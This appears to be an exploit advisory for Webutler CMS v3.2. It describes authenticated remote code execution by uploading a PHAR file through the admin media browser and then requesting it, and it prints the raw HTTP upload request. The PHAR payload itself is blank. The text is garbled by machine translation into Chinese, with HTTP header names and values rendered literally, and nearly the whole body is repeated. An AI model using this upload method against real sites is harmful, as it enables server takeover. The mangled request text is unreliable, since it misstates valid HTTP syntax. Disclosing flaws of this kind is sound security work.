exploit title: webutler v3.2-远程代码执行(RCE)
Application: Wewebutler CMS
版本: v3.2
BUGS: RCE
Technology: php
供应商URL: https://webutler.de/en
软件link: http://webutler.de/download/webutler_v3.2.zip
发现日期: 03.08.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录以作为管理员的帐户
2。去参观媒体
3.UPLOAD PHAR文件
4。上传poc.phar文件
poc.phar文件内容:
?
5。访问poc.phar文件
POC请求:
post/webutler_v3.2/admin/browser/index.php?upload=newfiletypes=fileActualFolder=%2ffilename=poc.pharoverwrite=True=True http/1.1
HOST: LOCALHOST
内容长度: 40
SEC-CH-UA:
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
x_filename: poc.phar
sec-ch-ua-platform:''
ACCEPT: /
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/webutler_v3.2/admin/browser/index.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: webutler=ekgfsfhi3ocqdvv7ukqoropolu
连接:关闭
?
Application: Wewebutler CMS
版本: v3.2
BUGS: RCE
Technology: php
供应商URL: https://webutler.de/en
软件link: http://webutler.de/download/webutler_v3.2.zip
发现日期: 03.08.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录以作为管理员的帐户
2。去参观媒体
3.UPLOAD PHAR文件
4。上传poc.phar文件
poc.phar文件内容:
?
5。访问poc.phar文件
POC请求:
post/webutler_v3.2/admin/browser/index.php?upload=newfiletypes=fileActualFolder=%2ffilename=poc.pharoverwrite=True=True http/1.1
HOST: LOCALHOST
内容长度: 40
SEC-CH-UA:
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
x_filename: poc.phar
sec-ch-ua-platform:''
ACCEPT: /
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/webutler_v3.2/admin/browser/index.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: webutler=ekgfsfhi3ocqdvv7ukqoropolu
连接:关闭
?
